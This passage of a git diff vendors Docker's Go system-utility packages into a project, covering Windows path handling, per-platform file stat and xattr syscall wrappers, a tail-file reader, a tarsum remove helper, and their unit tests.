OS semantics (IOW / to \). We +// need the path in this syntax so that it can ultimately be contatenated with +// a Windows long-path which doesn't support drive-letters. 
Examples: +// C: --> Fail +// C:\ --> \ +// a --> a +// /a --> \a +// d:\ --> Fail +func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { + if len(path) == 2 && string(path[1]) == ":" { + return "", fmt.Errorf("No relative path specified in %q", path) + } + if !filepath.IsAbs(path) || len(path) < 2 { + return filepath.FromSlash(path), nil + } + if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") { + return "", fmt.Errorf("The specified path is not on the system drive (C:)") + } + return filepath.FromSlash(path[2:]), nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go new file mode 100644 index 0000000000..eccb26aaea --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go @@ -0,0 +1,78 @@ +// +build windows + +package system + +import "testing" + +// TestCheckSystemDriveAndRemoveDriveLetter tests CheckSystemDriveAndRemoveDriveLetter +func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { + // Fails if not C drive. 
+ path, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`) + if err == nil || (err != nil && err.Error() != "The specified path is not on the system drive (C:)") { + t.Fatalf("Expected error for d:") + } + + // Single character is unchanged + if path, err = CheckSystemDriveAndRemoveDriveLetter("z"); err != nil { + t.Fatalf("Single character should pass") + } + if path != "z" { + t.Fatalf("Single character should be unchanged") + } + + // Two characters without colon is unchanged + if path, err = CheckSystemDriveAndRemoveDriveLetter("AB"); err != nil { + t.Fatalf("2 characters without colon should pass") + } + if path != "AB" { + t.Fatalf("2 characters without colon should be unchanged") + } + + // Abs path without drive letter + if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`); err != nil { + t.Fatalf("abs path no drive letter should pass") + } + if path != `\l` { + t.Fatalf("abs path without drive letter should be unchanged") + } + + // Abs path without drive letter, linux style + if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`); err != nil { + t.Fatalf("abs path no drive letter linux style should pass") + } + if path != `\l` { + t.Fatalf("abs path without drive letter linux failed %s", path) + } + + // Drive-colon should be stripped + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`); err != nil { + t.Fatalf("An absolute path should pass") + } + if path != `\` { + t.Fatalf(`An absolute path should have been shortened to \ %s`, path) + } + + // Verify with a linux-style path + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`); err != nil { + t.Fatalf("An absolute path should pass") + } + if path != `\` { + t.Fatalf(`A linux style absolute path should have been shortened to \ %s`, path) + } + + // Failure on c: + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`); err == nil { + t.Fatalf("c: should fail") + } + if err.Error() != `No relative path specified in "c:"` { + t.Fatalf(path, err) + } + + // Failure on d: + if 
path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`); err == nil { + t.Fatalf("c: should fail") + } + if err.Error() != `No relative path specified in "d:"` { + t.Fatalf(path, err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat.go b/vendor/github.com/docker/docker/pkg/system/stat.go new file mode 100644 index 0000000000..087034c5ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat.go @@ -0,0 +1,53 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// StatT type contains status of a file. It contains metadata +// like permission, owner, group, size, etc about a file. +type StatT struct { + mode uint32 + uid uint32 + gid uint32 + rdev uint64 + size int64 + mtim syscall.Timespec +} + +// Mode returns file's permission mode. +func (s StatT) Mode() uint32 { + return s.mode +} + +// UID returns file's user id of owner. +func (s StatT) UID() uint32 { + return s.uid +} + +// GID returns file's group id of owner. +func (s StatT) GID() uint32 { + return s.gid +} + +// Rdev returns file's device ID (if it's special file). +func (s StatT) Rdev() uint64 { + return s.rdev +} + +// Size returns file's size. +func (s StatT) Size() int64 { + return s.size +} + +// Mtim returns file's last modification time. +func (s StatT) Mtim() syscall.Timespec { + return s.mtim +} + +// GetLastModification returns file's last modification time. 
+func (s StatT) GetLastModification() syscall.Timespec { + return s.Mtim() +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go new file mode 100644 index 0000000000..f0742f59e5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go @@ -0,0 +1,32 @@ +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtimespec}, nil +} + +// FromStatT loads a system.StatT from a syscall.Stat_t. +func FromStatT(s *syscall.Stat_t) (*StatT, error) { + return fromStatT(s) +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go new file mode 100644 index 0000000000..d0fb6f1519 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go @@ -0,0 +1,27 @@ +package system + +import ( + "syscall" +) + +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtimespec}, nil +} + +// Stat takes a path to a file and returns +// a system.Stat_t type pertaining to that file. 
+// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_linux.go b/vendor/github.com/docker/docker/pkg/system/stat_linux.go new file mode 100644 index 0000000000..8b1eded138 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_linux.go @@ -0,0 +1,33 @@ +package system + +import ( + "syscall" +) + +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: s.Mode, + uid: s.Uid, + gid: s.Gid, + rdev: s.Rdev, + mtim: s.Mtim}, nil +} + +// FromStatT exists only on linux, and loads a system.StatT from a +// syscal.Stat_t. +func FromStatT(s *syscall.Stat_t) (*StatT, error) { + return fromStatT(s) +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. 
+// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go new file mode 100644 index 0000000000..3c3b71fb21 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go @@ -0,0 +1,15 @@ +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtim}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go new file mode 100644 index 0000000000..0216985a25 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go @@ -0,0 +1,34 @@ +// +build solaris + +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtim}, nil +} + +// FromStatT loads a system.StatT from a syscal.Stat_t. +func FromStatT(s *syscall.Stat_t) (*StatT, error) { + return fromStatT(s) +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. 
+// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go new file mode 100644 index 0000000000..dee8d30a19 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go @@ -0,0 +1,39 @@ +// +build linux freebsd + +package system + +import ( + "os" + "syscall" + "testing" +) + +// TestFromStatT tests fromStatT for a tempfile +func TestFromStatT(t *testing.T) { + file, _, _, dir := prepareFiles(t) + defer os.RemoveAll(dir) + + stat := &syscall.Stat_t{} + err := syscall.Lstat(file, stat) + + s, err := fromStatT(stat) + if err != nil { + t.Fatal(err) + } + + if stat.Mode != s.Mode() { + t.Fatal("got invalid mode") + } + if stat.Uid != s.UID() { + t.Fatal("got invalid uid") + } + if stat.Gid != s.GID() { + t.Fatal("got invalid gid") + } + if stat.Rdev != s.Rdev() { + t.Fatal("got invalid rdev") + } + if stat.Mtim != s.Mtim() { + t.Fatal("got invalid mtim") + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go new file mode 100644 index 0000000000..5d85f523cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go @@ -0,0 +1,17 @@ +// +build !linux,!windows,!freebsd,!solaris,!openbsd,!darwin + +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtimespec}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_windows.go b/vendor/github.com/docker/docker/pkg/system/stat_windows.go new file mode 100644 index 
0000000000..39490c625c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_windows.go @@ -0,0 +1,43 @@ +// +build windows + +package system + +import ( + "os" + "time" +) + +// StatT type contains status of a file. It contains metadata +// like name, permission, size, etc about a file. +type StatT struct { + name string + size int64 + mode os.FileMode + modTime time.Time + isDir bool +} + +// Name returns file's name. +func (s StatT) Name() string { + return s.name +} + +// Size returns file's size. +func (s StatT) Size() int64 { + return s.size +} + +// Mode returns file's permission mode. +func (s StatT) Mode() os.FileMode { + return s.mode +} + +// ModTime returns file's last modification time. +func (s StatT) ModTime() time.Time { + return s.modTime +} + +// IsDir returns whether file is actually a directory. +func (s StatT) IsDir() bool { + return s.isDir +} diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go new file mode 100644 index 0000000000..3ae9128468 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go @@ -0,0 +1,17 @@ +// +build linux freebsd + +package system + +import "syscall" + +// Unmount is a platform-specific helper function to call +// the unmount syscall. +func Unmount(dest string) error { + return syscall.Unmount(dest, 0) +} + +// CommandLineToArgv should not be used on Unix. +// It simply returns commandLine in the only element in the returned array. 
+func CommandLineToArgv(commandLine string) ([]string, error) { + return []string{commandLine}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go new file mode 100644 index 0000000000..1f311874f4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go @@ -0,0 +1,105 @@ +package system + +import ( + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" +) + +var ( + ntuserApiset = syscall.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0") + procGetVersionExW = modkernel32.NewProc("GetVersionExW") +) + +// OSVersion is a wrapper for Windows version information +// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724439(v=vs.85).aspx +type OSVersion struct { + Version uint32 + MajorVersion uint8 + MinorVersion uint8 + Build uint16 +} + +// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx +type osVersionInfoEx struct { + OSVersionInfoSize uint32 + MajorVersion uint32 + MinorVersion uint32 + BuildNumber uint32 + PlatformID uint32 + CSDVersion [128]uint16 + ServicePackMajor uint16 + ServicePackMinor uint16 + SuiteMask uint16 + ProductType byte + Reserve byte +} + +// GetOSVersion gets the operating system version on Windows. Note that +// docker.exe must be manifested to get the correct version information. +func GetOSVersion() OSVersion { + var err error + osv := OSVersion{} + osv.Version, err = syscall.GetVersion() + if err != nil { + // GetVersion never fails. + panic(err) + } + osv.MajorVersion = uint8(osv.Version & 0xFF) + osv.MinorVersion = uint8(osv.Version >> 8 & 0xFF) + osv.Build = uint16(osv.Version >> 16) + return osv +} + +// IsWindowsClient returns true if the SKU is client +// @engine maintainers - this function should not be removed or modified as it +// is used to enforce licensing restrictions on Windows. 
+func IsWindowsClient() bool { + osviex := &osVersionInfoEx{OSVersionInfoSize: 284} + r1, _, err := procGetVersionExW.Call(uintptr(unsafe.Pointer(osviex))) + if r1 == 0 { + logrus.Warnf("GetVersionExW failed - assuming server SKU: %v", err) + return false + } + const verNTWorkstation = 0x00000001 + return osviex.ProductType == verNTWorkstation +} + +// Unmount is a platform-specific helper function to call +// the unmount syscall. Not supported on Windows +func Unmount(dest string) error { + return nil +} + +// CommandLineToArgv wraps the Windows syscall to turn a commandline into an argument array. +func CommandLineToArgv(commandLine string) ([]string, error) { + var argc int32 + + argsPtr, err := syscall.UTF16PtrFromString(commandLine) + if err != nil { + return nil, err + } + + argv, err := syscall.CommandLineToArgv(argsPtr, &argc) + if err != nil { + return nil, err + } + defer syscall.LocalFree(syscall.Handle(uintptr(unsafe.Pointer(argv)))) + + newArgs := make([]string, argc) + for i, v := range (*argv)[:argc] { + newArgs[i] = string(syscall.UTF16ToString((*v)[:])) + } + + return newArgs, nil +} + +// HasWin32KSupport determines whether containers that depend on win32k can +// run on this machine. Win32k is the driver used to implement windowing. +func HasWin32KSupport() bool { + // For now, check for ntuser API support on the host. In the future, a host + // may support win32k in containers even if the host does not support ntuser + // APIs. 
+ return ntuserApiset.Load() == nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go new file mode 100644 index 0000000000..4886b2b9b4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go @@ -0,0 +1,9 @@ +package system + +import "testing" + +func TestHasWin32KSupport(t *testing.T) { + s := HasWin32KSupport() // make sure this doesn't panic + + t.Logf("win32k: %v", s) // will be different on different platforms -- informative only +} diff --git a/vendor/github.com/docker/docker/pkg/system/umask.go b/vendor/github.com/docker/docker/pkg/system/umask.go new file mode 100644 index 0000000000..3d0146b01a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/umask.go @@ -0,0 +1,13 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// Umask sets current process's file mode creation mask to newmask +// and returns oldmask. +func Umask(newmask int) (oldmask int, err error) { + return syscall.Umask(newmask), nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/umask_windows.go b/vendor/github.com/docker/docker/pkg/system/umask_windows.go new file mode 100644 index 0000000000..13f1de1769 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/umask_windows.go @@ -0,0 +1,9 @@ +// +build windows + +package system + +// Umask is not supported on the windows platform. 
+func Umask(newmask int) (oldmask int, err error) { + // should not be called on cli code path + return 0, ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go new file mode 100644 index 0000000000..e2eac3b553 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go @@ -0,0 +1,22 @@ +package system + +import ( + "syscall" + "unsafe" +) + +// LUtimesNano is used to change access and modification time of the specified path. +// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +func LUtimesNano(path string, ts []syscall.Timespec) error { + var _path *byte + _path, err := syscall.BytePtrFromString(path) + if err != nil { + return err + } + + if _, _, err := syscall.Syscall(syscall.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != syscall.ENOSYS { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go new file mode 100644 index 0000000000..fc8a1aba95 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go @@ -0,0 +1,26 @@ +package system + +import ( + "syscall" + "unsafe" +) + +// LUtimesNano is used to change access and modification time of the specified path. +// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. 
+func LUtimesNano(path string, ts []syscall.Timespec) error { + // These are not currently available in syscall + atFdCwd := -100 + atSymLinkNoFollow := 0x100 + + var _path *byte + _path, err := syscall.BytePtrFromString(path) + if err != nil { + return err + } + + if _, _, err := syscall.Syscall6(syscall.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), uintptr(atSymLinkNoFollow), 0, 0); err != 0 && err != syscall.ENOSYS { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go new file mode 100644 index 0000000000..a73ed118c9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go @@ -0,0 +1,68 @@ +// +build linux freebsd + +package system + +import ( + "io/ioutil" + "os" + "path/filepath" + "syscall" + "testing" +) + +// prepareFiles creates files for testing in the temp directory +func prepareFiles(t *testing.T) (string, string, string, string) { + dir, err := ioutil.TempDir("", "docker-system-test") + if err != nil { + t.Fatal(err) + } + + file := filepath.Join(dir, "exist") + if err := ioutil.WriteFile(file, []byte("hello"), 0644); err != nil { + t.Fatal(err) + } + + invalid := filepath.Join(dir, "doesnt-exist") + + symlink := filepath.Join(dir, "symlink") + if err := os.Symlink(file, symlink); err != nil { + t.Fatal(err) + } + + return file, invalid, symlink, dir +} + +func TestLUtimesNano(t *testing.T) { + file, invalid, symlink, dir := prepareFiles(t) + defer os.RemoveAll(dir) + + before, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + ts := []syscall.Timespec{{Sec: 0, Nsec: 0}, {Sec: 0, Nsec: 0}} + if err := LUtimesNano(symlink, ts); err != nil { + t.Fatal(err) + } + + symlinkInfo, err := os.Lstat(symlink) + if err != nil { + t.Fatal(err) + } + if before.ModTime().Unix() == symlinkInfo.ModTime().Unix() { + t.Fatal("The modification time of the 
symlink should be different") + } + + fileInfo, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + if before.ModTime().Unix() != fileInfo.ModTime().Unix() { + t.Fatal("The modification time of the file should be same") + } + + if err := LUtimesNano(invalid, ts); err == nil { + t.Fatal("Doesn't return an error on a non-existing file") + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go new file mode 100644 index 0000000000..139714544d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go @@ -0,0 +1,10 @@ +// +build !linux,!freebsd + +package system + +import "syscall" + +// LUtimesNano is only supported on linux and freebsd. +func LUtimesNano(path string, ts []syscall.Timespec) error { + return ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go new file mode 100644 index 0000000000..d2e2c05799 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go @@ -0,0 +1,63 @@ +package system + +import ( + "syscall" + "unsafe" +) + +// Lgetxattr retrieves the value of the extended attribute identified by attr +// and associated with the given path in the file system. +// It will returns a nil slice and nil error if the xattr is not set. 
+func Lgetxattr(path string, attr string) ([]byte, error) { + pathBytes, err := syscall.BytePtrFromString(path) + if err != nil { + return nil, err + } + attrBytes, err := syscall.BytePtrFromString(attr) + if err != nil { + return nil, err + } + + dest := make([]byte, 128) + destBytes := unsafe.Pointer(&dest[0]) + sz, _, errno := syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) + if errno == syscall.ENODATA { + return nil, nil + } + if errno == syscall.ERANGE { + dest = make([]byte, sz) + destBytes := unsafe.Pointer(&dest[0]) + sz, _, errno = syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) + } + if errno != 0 { + return nil, errno + } + + return dest[:sz], nil +} + +var _zero uintptr + +// Lsetxattr sets the value of the extended attribute identified by attr +// and associated with the given path in the file system. 
+func Lsetxattr(path string, attr string, data []byte, flags int) error { + pathBytes, err := syscall.BytePtrFromString(path) + if err != nil { + return err + } + attrBytes, err := syscall.BytePtrFromString(attr) + if err != nil { + return err + } + var dataBytes unsafe.Pointer + if len(data) > 0 { + dataBytes = unsafe.Pointer(&data[0]) + } else { + dataBytes = unsafe.Pointer(&_zero) + } + _, _, errno := syscall.Syscall6(syscall.SYS_LSETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(dataBytes), uintptr(len(data)), uintptr(flags), 0) + if errno != 0 { + return errno + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go new file mode 100644 index 0000000000..0114f2227c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go @@ -0,0 +1,13 @@ +// +build !linux + +package system + +// Lgetxattr is not supported on platforms other than linux. +func Lgetxattr(path string, attr string) ([]byte, error) { + return nil, ErrNotSupportedPlatform +} + +// Lsetxattr is not supported on platforms other than linux. +func Lsetxattr(path string, attr string, data []byte, flags int) error { + return ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go new file mode 100644 index 0000000000..09eb393ab7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go @@ -0,0 +1,66 @@ +// Package tailfile provides helper functions to read the nth lines of any +// ReadSeeker. +package tailfile + +import ( + "bytes" + "errors" + "io" + "os" +) + +const blockSize = 1024 + +var eol = []byte("\n") + +// ErrNonPositiveLinesNumber is an error returned if the lines number was negative. 
+var ErrNonPositiveLinesNumber = errors.New("The number of lines to extract from the file must be positive") + +//TailFile returns last n lines of reader f (could be a fil). +func TailFile(f io.ReadSeeker, n int) ([][]byte, error) { + if n <= 0 { + return nil, ErrNonPositiveLinesNumber + } + size, err := f.Seek(0, os.SEEK_END) + if err != nil { + return nil, err + } + block := -1 + var data []byte + var cnt int + for { + var b []byte + step := int64(block * blockSize) + left := size + step // how many bytes to beginning + if left < 0 { + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + return nil, err + } + b = make([]byte, blockSize+left) + if _, err := f.Read(b); err != nil { + return nil, err + } + data = append(b, data...) + break + } else { + b = make([]byte, blockSize) + if _, err := f.Seek(left, os.SEEK_SET); err != nil { + return nil, err + } + if _, err := f.Read(b); err != nil { + return nil, err + } + data = append(b, data...) + } + cnt += bytes.Count(b, eol) + if cnt > n { + break + } + block-- + } + lines := bytes.Split(data, eol) + if n < len(lines) { + return lines[len(lines)-n-1 : len(lines)-1], nil + } + return lines[:len(lines)-1], nil +} diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go new file mode 100644 index 0000000000..31217c036c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go @@ -0,0 +1,148 @@ +package tailfile + +import ( + "io/ioutil" + "os" + "testing" +) + +func TestTailFile(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + testFile := []byte(`first line +second line +third line +fourth line +fifth line +next first line +next second line +next third line +next fourth line +next fifth line +last first line +next first line +next second line +next third line +next fourth line +next fifth line +next first line +next 
second line +next third line +next fourth line +next fifth line +last second line +last third line +last fourth line +last fifth line +truncated line`) + if _, err := f.Write(testFile); err != nil { + t.Fatal(err) + } + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + t.Fatal(err) + } + expected := []string{"last fourth line", "last fifth line"} + res, err := TailFile(f, 2) + if err != nil { + t.Fatal(err) + } + for i, l := range res { + t.Logf("%s", l) + if expected[i] != string(l) { + t.Fatalf("Expected line %s, got %s", expected[i], l) + } + } +} + +func TestTailFileManyLines(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + testFile := []byte(`first line +second line +truncated line`) + if _, err := f.Write(testFile); err != nil { + t.Fatal(err) + } + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + t.Fatal(err) + } + expected := []string{"first line", "second line"} + res, err := TailFile(f, 10000) + if err != nil { + t.Fatal(err) + } + for i, l := range res { + t.Logf("%s", l) + if expected[i] != string(l) { + t.Fatalf("Expected line %s, got %s", expected[i], l) + } + } +} + +func TestTailEmptyFile(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + res, err := TailFile(f, 10000) + if err != nil { + t.Fatal(err) + } + if len(res) != 0 { + t.Fatal("Must be empty slice from empty file") + } +} + +func TestTailNegativeN(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + testFile := []byte(`first line +second line +truncated line`) + if _, err := f.Write(testFile); err != nil { + t.Fatal(err) + } + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + t.Fatal(err) + } + if _, err := TailFile(f, -1); err != ErrNonPositiveLinesNumber { + t.Fatalf("Expected 
ErrNonPositiveLinesNumber, got %s", err) + } + if _, err := TailFile(f, 0); err != ErrNonPositiveLinesNumber { + t.Fatalf("Expected ErrNonPositiveLinesNumber, got %s", err) + } +} + +func BenchmarkTail(b *testing.B) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + b.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + for i := 0; i < 10000; i++ { + if _, err := f.Write([]byte("tailfile pretty interesting line\n")); err != nil { + b.Fatal(err) + } + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + if _, err := TailFile(f, 1000); err != nil { + b.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go new file mode 100644 index 0000000000..b42983e984 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go @@ -0,0 +1,21 @@ +package tarsum + +// BuilderContext is an interface extending TarSum by adding the Remove method. +// In general there was concern about adding this method to TarSum itself +// so instead it is being added just to "BuilderContext" which will then +// only be used during the .dockerignore file processing +// - see builder/evaluator.go +type BuilderContext interface { + TarSum + Remove(string) +} + +func (bc *tarSum) Remove(filename string) { + for i, fis := range bc.sums { + if fis.Name() == filename { + bc.sums = append(bc.sums[:i], bc.sums[i+1:]...) 
+ // Note, we don't just return because there could be + // more than one with this name + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go new file mode 100644 index 0000000000..f54bf3a1bd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go @@ -0,0 +1,67 @@ +package tarsum + +import ( + "io" + "io/ioutil" + "os" + "testing" +) + +// Try to remove tarsum (in the BuilderContext) that do not exists, won't change a thing +func TestTarSumRemoveNonExistent(t *testing.T) { + filename := "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar" + reader, err := os.Open(filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + ts, err := NewTarSum(reader, false, Version0) + if err != nil { + t.Fatal(err) + } + + // Read and discard bytes so that it populates sums + _, err = io.Copy(ioutil.Discard, ts) + if err != nil { + t.Errorf("failed to read from %s: %s", filename, err) + } + + expected := len(ts.GetSums()) + + ts.(BuilderContext).Remove("") + ts.(BuilderContext).Remove("Anything") + + if len(ts.GetSums()) != expected { + t.Fatalf("Expected %v sums, go %v.", expected, ts.GetSums()) + } +} + +// Remove a tarsum (in the BuilderContext) +func TestTarSumRemove(t *testing.T) { + filename := "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar" + reader, err := os.Open(filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + ts, err := NewTarSum(reader, false, Version0) + if err != nil { + t.Fatal(err) + } + + // Read and discard bytes so that it populates sums + _, err = io.Copy(ioutil.Discard, ts) + if err != nil { + t.Errorf("failed to read from %s: %s", filename, err) + } + + expected := 